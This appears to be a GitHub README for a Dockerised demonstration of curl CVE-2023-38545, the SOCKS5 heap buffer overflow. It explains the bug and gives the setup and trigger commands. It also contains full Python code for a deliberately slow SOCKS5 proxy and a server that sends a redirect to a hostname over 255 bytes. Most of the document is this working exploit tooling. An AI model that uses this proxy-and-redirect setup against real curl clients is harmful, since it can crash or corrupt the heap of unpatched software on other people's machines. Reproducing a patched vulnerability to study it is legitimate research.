vanigori/CVE-2023-38545-sample

Quick description

This showcases cURL CVE-2023-38545, the SOCKS5 heap buffer overflow in curl and libcurl 7.69.0 through 8.3.0 (fixed in 8.4.0). The bug: when curl is told to let a SOCKS5 proxy resolve hostnames (socks5h://) and the hostname is longer than the 255 bytes the SOCKS5 protocol allows, curl is supposed to fall back to local resolution; if the proxy handshake is slow enough that curl's state machine has to return to its event loop mid-handshake, that decision is lost and the over-long hostname is copied into a heap buffer that is too small for it. It is as lightweight as I could make it.

Setup

First, build the Docker Image:

docker build . -t cveimage

Next, run the image. --rm makes the container temporary (it is deleted once stopped), and --net="host" puts it in the host's network namespace, so the proxy port (1080) and the redirect server port (8000) are the same inside and outside the container:

docker run --rm --tty --net="host" --name cvecontainer cveimage

The container is started with a TTY but without an attached stdin, so you cannot type into it directly. To get a shell, open another terminal and run:

docker exec -it cvecontainer /bin/bash

Now start both services: the HTTP server that answers with the malicious redirect, and the SOCKS5 proxy that curl will be pointed at. From the shell attached to the already-running container, run:

./exploit/malicious_redirect_server.sh &

python3 /exploit/proxy.py &

Now, from inside the container, trigger the bug. --location makes curl follow the redirect served on port 8000; socks5h:// makes curl hand the hostname to the proxy for resolution, which is the vulnerable code path; --limit-rate 100 shrinks curl's download buffer, the same heap buffer the SOCKS5 handshake is built in, down to curl's 1024-byte minimum, so the out-of-bounds write is more likely to reach memory it cannot touch and crash:

curl -vvv --limit-rate 100 --location --proxy socks5h://127.0.0.1:1080 http://localhost:8000

A segmentation fault from the curl process is the sign that the overflow happened. If you do not see one, either the vulnerable path was not taken (for example because the curl in use is 8.4.0 or later, which rejects an over-long hostname in this situation with an error instead of resolving it locally), or the out-of-bounds write landed in mapped heap memory and corrupted it silently. The absence of a crash does not mean the build is safe.
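To make the moving parts concrete, here is a minimal re-creation of the two services the steps above start. This is an added example, not the repository's own exploit/malicious_redirect_server.sh or /exploit/proxy.py: an HTTP server that answers every request with a 301 to a hostname longer than 255 bytes, and a SOCKS5 proxy that deliberately delays its reply to curl's greeting so the handshake does not finish in curl's first pass (the "slow SOCKS5 handshake" condition). The ports match the README's curl command; the hostname length, the delay and the helper names are assumptions chosen for the demo.

```python
"""Slow SOCKS5 proxy plus malicious redirect server for the CVE-2023-38545 demo.
Added example (assumptions: ports, hostname, delay); not the repo's own scripts."""
import socket
import threading
import time
from urllib.parse import urlsplit

HTTP_PORT = 8000          # the README's curl target, http://localhost:8000
SOCKS_PORT = 1080         # the README's --proxy socks5h://127.0.0.1:1080
GREETING_DELAY = 1.0      # seconds to stall before answering curl's greeting (assumption)
SOCKS5_MAX_HOST = 255     # SOCKS5 carries the hostname length in one byte
LONG_HOST = "a" * 300 + ".invalid"   # constructed: 308 bytes, over the protocol limit
REDIRECT_URL = f"http://{LONG_HOST}/"


def hostname_exceeds_socks5_limit(url: str) -> bool:
    """True if the URL's host cannot be sent in a SOCKS5 DOMAINNAME request."""
    host = urlsplit(url).hostname or ""
    return len(host.encode()) > SOCKS5_MAX_HOST


def build_redirect_response(target_url: str) -> bytes:
    """HTTP/1.1 response that makes `curl --location` follow to target_url."""
    return (
        "HTTP/1.1 301 Moved Permanently\r\n"
        f"Location: {target_url}\r\n"
        "Content-Length: 0\r\n"
        "Connection: close\r\n\r\n"
    ).encode()


def parse_socks5_request(data: bytes):
    """Parse a SOCKS5 CONNECT (CMD=1) with ATYP=3 (domain name) -> (host, port)."""
    if len(data) < 5 or data[0] != 0x05 or data[1] != 0x01 or data[3] != 0x03:
        raise ValueError("not a SOCKS5 CONNECT with a domain-name address")
    n = data[4]
    host = data[5:5 + n].decode()
    port = int.from_bytes(data[5 + n:7 + n], "big")
    return host, port


def pipe(src: socket.socket, dst: socket.socket) -> None:
    """Relay bytes one way until either side closes."""
    try:
        while chunk := src.recv(4096):
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        for s in (src, dst):
            try:
                s.shutdown(socket.SHUT_RDWR)
            except OSError:
                pass


def handle_socks_client(client: socket.socket) -> None:
    """One SOCKS5 session: stalled greeting reply, then a plain CONNECT relay."""
    try:
        greeting = client.recv(262)                  # VER NMETHODS METHODS...
        if len(greeting) < 3 or greeting[0] != 0x05:
            return
        time.sleep(GREETING_DELAY)                   # the slow part of the handshake
        client.sendall(b"\x05\x00")                  # method 0: no authentication
        try:
            host, port = parse_socks5_request(client.recv(4096))
        except ValueError:
            client.sendall(b"\x05\x01\x00\x01" + bytes(6))   # REP=1 general failure
            return
        upstream = socket.create_connection((host, port))
        client.sendall(b"\x05\x00\x00\x01" + bytes(6))       # REP=0, BND 0.0.0.0:0
        threading.Thread(target=pipe, args=(client, upstream), daemon=True).start()
        pipe(upstream, client)
    except OSError:
        pass
    finally:
        client.close()


def serve_redirects() -> None:
    """Answer every HTTP request on HTTP_PORT with the over-long redirect."""
    with socket.create_server(("127.0.0.1", HTTP_PORT)) as srv:
        while True:
            conn, _ = srv.accept()
            with conn:
                conn.recv(4096)                      # request headers; contents irrelevant
                conn.sendall(build_redirect_response(REDIRECT_URL))


if __name__ == "__main__":
    threading.Thread(target=serve_redirects, daemon=True).start()
    with socket.create_server(("127.0.0.1", SOCKS_PORT)) as srv:
        while True:
            client, _ = srv.accept()
            threading.Thread(target=handle_socks_client, args=(client,), daemon=True).start()
```

Run it in place of the two background services, then issue the README's curl command. The first CONNECT carries "localhost":8000 and is relayed normally; the redirect hands curl a hostname that hostname_exceeds_socks5_limit() flags, and it is curl's handling of that second, over-long name during the stalled handshake that matters. A patched curl stops at that point with an error; a vulnerable one corrupts its own heap before anything further reaches the proxy, which is why the proxy tolerates a malformed or missing second request.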

More work (PRs welcome)

  • Make this README look pretty
  • Configure systemd to automatically start the exploit code
  • Reduce Docker Image build time and size
  • Anything/everything else...?

About

Dockerfile containing all the necessary setup files to demo the exploit